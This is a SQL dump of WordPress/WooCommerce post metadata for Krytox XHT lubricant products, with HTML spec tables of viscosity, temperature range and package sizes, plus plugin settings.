INSERT INTO `wp_postmeta` VALUES (5492, 670, '_menu_item_target', ''); 
INSERT INTO `wp_postmeta` VALUES (5493, 670, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'); 
INSERT INTO `wp_postmeta` VALUES (5494, 670, '_menu_item_xfn', ''); 
INSERT INTO `wp_postmeta` VALUES (5495, 670, '_menu_item_url', ''); 
INSERT INTO `wp_postmeta` VALUES (5506, 664, '_aioseop_description', 'Krytox & Miller-Stephenson related articles'); 
INSERT INTO `wp_postmeta` VALUES (5507, 664, '_aioseop_title', 'Articles '); 
INSERT INTO `wp_postmeta` VALUES (5508, 664, '_aioseop_menulabel', 'Articles'); 
INSERT INTO `wp_postmeta` VALUES (5509, 489, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (5510, 671, '_edit_lock', '1475692030:2'); 
INSERT INTO `wp_postmeta` VALUES (5511, 671, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (5512, 671, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (5513, 671, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (5514, 671, '312_default_editor', '<table width="1214">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: left;" width="202">Grade</td>\r\n<td style="text-align: center;" width="224">Thickener</td>\r\n<td style="text-align: center;" width="241">Viscosity (cSt) @ 40°C</td>\r\n<td style="text-align: center;" width="213">Viscosity (cSt) @ 100°C</td>\r\n<td style="text-align: center;" width="167">Viscosity (cSt) @ 200°C</td>\r\n<td style="text-align: center;" width="167">Anti-Corrosion Additive</td>\r\n</tr>\r\n<tr>\r\n<td>XHT-S</td>\r\n<td style="text-align: center;">PTFE</td>\r\n<td style="text-align: center;">500</td>\r\n<td style="text-align: center;">46</td>\r\n<td style="text-align: center;">6.8</td>\r\n<td style="text-align: center;">No</td>\r\n</tr>\r\n<tr>\r\n<td>XHT-SX</td>\r\n<td style="text-align: center;">PTFE</td>\r\n<td style="text-align: center;">738</td>\r\n<td style="text-align: center;">65</td>\r\n<td style="text-align: center;">8.8</td>\r\n<td style="text-align: center;">No</td>\r\n</tr>\r\n<tr>\r\n<td>XHT-AC</td>\r\n<td style="text-align: center;">PTFE</td>\r\n<td style="text-align: center;">500</td>\r\n<td style="text-align: center;">46</td>\r\n<td style="text-align: center;">6.8</td>\r\n<td style="text-align: center;">Yes</td>\r\n</tr>\r\n<tr>\r\n<td>XHT-ACX</td>\r\n<td style="text-align: center;">PTFE</td>\r\n<td style="text-align: center;">738</td>\r\n<td style="text-align: center;">65</td>\r\n<td style="text-align: center;">8.8</td>\r\n<td style="text-align: center;">Yes</td>\r\n</tr>\r\n<tr>\r\n<td>XHT-BD</td>\r\n<td style="text-align: center;">Non-melting</td>\r\n<td style="text-align: center;">500</td>\r\n<td style="text-align: center;">46</td>\r\n<td style="text-align: center;">6.8</td>\r\n<td style="text-align: center;">No</td>\r\n</tr>\r\n<tr>\r\n<td>XHT-BDX</td>\r\n<td style="text-align: center;">Non-melting</td>\r\n<td style="text-align: center;">738</td>\r\n<td style="text-align: center;">65</td>\r\n<td style="text-align: center;">8.8</td>\r\n<td style="text-align: center;">No</td>\r\n</tr>\r\n<tr>\r\n<td>XHT-BDZ</td>\r\n<td style="text-align: center;">Non-melting</td>\r\n<td style="text-align: center;">1023</td>\r\n<td style="text-align: center;">88</td>\r\n<td style="text-align: center;">11.4</td>\r\n<td style="text-align: center;">No</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<table width="667">\r\n<tbody>\r\n<tr>\r\n<td width="202"></td>\r\n<td style="text-align: center;" width="224">XHT-S</td>\r\n<td style="text-align: center;" width="241">XHT-SX</td>\r\n</tr>\r\n<tr>\r\n<td>Estimated Temperature Range</td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>°C</td>\r\n<td style="text-align: center;">(-200-300)</td>\r\n<td style="text-align: center;">(-10-300)</td>\r\n</tr>\r\n<tr>\r\n<td>°F</td>\r\n<td style="text-align: center;">(-4-572)</td>\r\n<td style="text-align: center;">(14-572)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (5515, 671, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">Syringe</p>\r\n</td>\r\n<td style="text-align: center;" width="125">Tube</td>\r\n<td style="text-align: center;" width="125">Jar</td>\r\n<td style="text-align: center;" width="125">Cartridge</td>\r\n<td width="125">\r\n<p style="text-align: center;">Pail</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">0.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td width="125">\r\n<p style="text-align: center;">5 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">7 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (5516, 671, '318_custom_list_file', 'a:1:{s:32:"9ad73b56f8e0fb40e93cb4ce5090eddb";a:3:{s:4:"name";s:7:"XHT PDF";s:4:"file";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/XHT-PDF.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (5517, 671, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (5518, 671, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5519, 671, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5520, 671, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (5521, 671, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5522, 671, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (5523, 671, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (5524, 671, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (5525, 671, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (5526, 671, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (5527, 671, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (5528, 671, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (5529, 671, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (5530, 671, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (5531, 671, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (5532, 671, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (5533, 671, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5534, 671, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5535, 671, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (5536, 671, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (5537, 671, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (5538, 671, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (5539, 671, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5540, 671, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5541, 671, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (5542, 671, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (5543, 671, '_product_image_gallery', '374,378,380,377,375,379,381'); 
INSERT INTO `wp_postmeta` VALUES (5544, 671, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5545, 671, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5546, 671, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (5547, 671, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (5548, 671, '_ywtm_content_tab_description', '<table width="667">\r\n<tbody>\r\n<tr>\r\n<td width="202"></td>\r\n<td style="text-align: center;" width="224">XHT-S</td>\r\n<td style="text-align: center;" width="241">XHT-SX</td>\r\n</tr>\r\n<tr>\r\n<td>Estimated Temperature Range</td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>°C</td>\r\n<td style="text-align: center;">(-200-300)</td>\r\n<td style="text-align: center;">(-10-300)</td>\r\n</tr>\r\n<tr>\r\n<td>°F</td>\r\n<td style="text-align: center;">(-4-572)</td>\r\n<td style="text-align: center;">(14-572)</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (5573, 671, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (5574, 671, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (5575, 672, '_edit_lock', '1475862467:2'); 
INSERT INTO `wp_postmeta` VALUES (5576, 672, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (5577, 672, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (5578, 672, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (5579, 672, '312_default_editor', '<table width="667">\r\n<tbody>\r\n<tr>\r\n<td width="202"></td>\r\n<td style="text-align: center;" width="224">XHT-AC</td>\r\n<td style="text-align: center;" width="241">XHT-ACX</td>\r\n</tr>\r\n<tr>\r\n<td>Estimated Temperature Range</td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>°C</td>\r\n<td style="text-align: center;">(-20-300)</td>\r\n<td style="text-align: center;">(-10-300)</td>\r\n</tr>\r\n<tr>\r\n<td>°F</td>\r\n<td style="text-align: center;">(-4-572)</td>\r\n<td style="text-align: center;">(14-572)</td>\r\n</tr>\r\n<tr>\r\n<td>Base Oil Viscosity, cSt</td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>20°C</td>\r\n<td style="text-align: center;">1712</td>\r\n<td style="text-align: center;">2610</td>\r\n</tr>\r\n<tr>\r\n<td>40°C</td>\r\n<td style="text-align: center;">500</td>\r\n<td style="text-align: center;">738</td>\r\n</tr>\r\n<tr>\r\n<td>100°C</td>\r\n<td style="text-align: center;">47</td>\r\n<td style="text-align: center;">65</td>\r\n</tr>\r\n<tr>\r\n<td>Food Contact Approval</td>\r\n<td style="text-align: center;">NSF H-1</td>\r\n<td style="text-align: center;">NSF H-1</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (5580, 672, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Syringe</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="125"><strong>Tube</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Cartridge</strong></td>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Pail</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">0.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td width="125">\r\n<p style="text-align: center;">5 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125">7 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (5581, 672, '318_custom_list_file', 'a:1:{s:32:"9ad73b56f8e0fb40e93cb4ce5090eddb";a:3:{s:4:"name";s:7:"XHT PDF";s:4:"file";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/XHT-PDF.pdf";s:4:"desc";s:10:"Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (5582, 672, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (5583, 672, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (5584, 672, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5585, 672, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5586, 672, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (5587, 672, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5588, 672, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (5589, 672, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (5590, 672, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (5591, 672, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (5592, 672, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (5593, 672, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (5594, 672, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (5595, 672, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (5596, 672, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (5597, 672, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (5598, 672, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (5599, 672, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (5600, 672, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5601, 672, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5602, 672, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (5603, 672, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (5604, 672, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (5605, 672, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (5606, 672, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5607, 672, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5608, 672, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (5609, 672, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (5610, 672, '_product_image_gallery', '374,380,378,377,375,379,381'); 
INSERT INTO `wp_postmeta` VALUES (5611, 674, '_edit_lock', '1475688886:2'); 
INSERT INTO `wp_postmeta` VALUES (5612, 674, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (5613, 674, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (5614, 674, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (5615, 674, '312_default_editor', '<table width="667">\r\n<tbody>\r\n<tr>\r\n<td width="202"></td>\r\n<td style="text-align: center;" width="224">XHT-AC</td>\r\n<td style="text-align: center;" width="241">XHT-ACX</td>\r\n</tr>\r\n<tr>\r\n<td>Estimated Temperature Range</td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>°C</td>\r\n<td style="text-align: center;">(-20-300)</td>\r\n<td style="text-align: center;">(-10-300)</td>\r\n</tr>\r\n<tr>\r\n<td>°F</td>\r\n<td style="text-align: center;">(-4-572)</td>\r\n<td style="text-align: center;">(14-572)</td>\r\n</tr>\r\n<tr>\r\n<td>Base Oil Viscosity, cSt</td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>20°C</td>\r\n<td style="text-align: center;">1712</td>\r\n<td style="text-align: center;">2610</td>\r\n</tr>\r\n<tr>\r\n<td>40°C</td>\r\n<td style="text-align: center;">500</td>\r\n<td style="text-align: center;">738</td>\r\n</tr>\r\n<tr>\r\n<td>100°C</td>\r\n<td style="text-align: center;">47</td>\r\n<td style="text-align: center;">65</td>\r\n</tr>\r\n<tr>\r\n<td>Food Contact Approval</td>\r\n<td style="text-align: center;">NSF H-1</td>\r\n<td style="text-align: center;">NSF H-1</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (5616, 674, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Syringe</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="125"><strong>Tube</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Cartridge</strong></td>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Pail</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">0.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td width="125">\r\n<p style="text-align: center;">5 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125">7 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (5617, 674, '318_custom_list_file', 'a:1:{s:32:"9ad73b56f8e0fb40e93cb4ce5090eddb";a:3:{s:4:"name";s:7:"XHT PDF";s:4:"file";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/XHT-PDF.pdf";s:4:"desc";s:10:"Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (5618, 674, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (5619, 674, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5620, 674, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5621, 674, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (5622, 674, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5623, 674, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (5624, 674, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (5625, 674, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (5626, 674, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (5627, 674, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (5628, 674, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (5629, 674, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (5630, 674, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (5631, 674, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (5632, 674, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (5633, 674, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (5634, 674, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5635, 674, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5636, 674, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (5637, 674, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (5638, 674, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (5639, 674, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (5640, 674, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5641, 674, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5642, 674, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (5643, 674, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (5644, 674, '_product_image_gallery', '378,380,377,375,374,379,381'); 
INSERT INTO `wp_postmeta` VALUES (5674, 674, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (5675, 674, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (5676, 675, '_edit_lock', '1476103959:2'); 
INSERT INTO `wp_postmeta` VALUES (5677, 675, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (5678, 674, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (5679, 675, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (5680, 675, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (5681, 675, '312_default_editor', '<table width="880">\r\n<tbody>\r\n<tr>\r\n<td width="202"></td>\r\n<td style="text-align: center;" width="224">XHT-BD</td>\r\n<td style="text-align: center;" width="241">XHT-BDX</td>\r\n<td style="text-align: center;" width="213">XHT-BDZ</td>\r\n</tr>\r\n<tr>\r\n<td>Estimated Temperature Range</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>°C</td>\r\n<td style="text-align: center;">(-20-300)</td>\r\n<td style="text-align: center;">(-15-350)</td>\r\n<td style="text-align: center;">(-5-360)</td>\r\n</tr>\r\n<tr>\r\n<td>°F</td>\r\n<td style="text-align: center;">(-4-572)</td>\r\n<td style="text-align: center;">(5-662)</td>\r\n<td style="text-align: center;">(23-680)</td>\r\n</tr>\r\n<tr>\r\n<td>Base Oil Viscosity, cSt</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>20°C</td>\r\n<td style="text-align: center;">1712</td>\r\n<td style="text-align: center;">2610</td>\r\n<td style="text-align: center;">3500</td>\r\n</tr>\r\n<tr>\r\n<td>40°C</td>\r\n<td style="text-align: center;">500</td>\r\n<td style="text-align: center;">738</td>\r\n<td style="text-align: center;">1023</td>\r\n</tr>\r\n<tr>\r\n<td>100°C</td>\r\n<td style="text-align: center;">47</td>\r\n<td style="text-align: center;">65</td>\r\n<td style="text-align: center;">88</td>\r\n</tr>\r\n<tr>\r\n<td>Specific Gravity</td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">2</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (5682, 675, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Syringe</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="125"><strong>Tube</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Cartridge</strong></td>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Pail</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">0.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td width="125">\r\n<p style="text-align: center;">5 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">7 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125">20 kg</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (5683, 675, '318_custom_list_file', 'a:1:{s:32:"9ad73b56f8e0fb40e93cb4ce5090eddb";a:3:{s:4:"name";s:7:"XHT PDF";s:4:"file";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/XHT-PDF.pdf";s:4:"desc";s:15:"Tech Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (5684, 675, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (5685, 675, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (5686, 675, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5687, 675, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5688, 675, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (5689, 675, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5690, 675, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (5691, 675, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (5692, 675, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (5693, 675, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (5694, 675, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (5695, 675, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (5696, 675, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (5697, 675, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (5698, 675, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (5699, 675, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (5700, 675, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (5701, 675, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (5702, 675, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5703, 675, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5704, 675, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (5705, 675, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (5706, 675, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (5707, 675, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (5708, 675, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5709, 675, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5710, 675, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (5711, 675, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (5712, 675, '_product_image_gallery', '374,378,380,377,375,379,381'); 
INSERT INTO `wp_postmeta` VALUES (5713, 675, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (5714, 676, '_wp_attached_file', '2016/08/shutterstock_56435803.jpg'); 
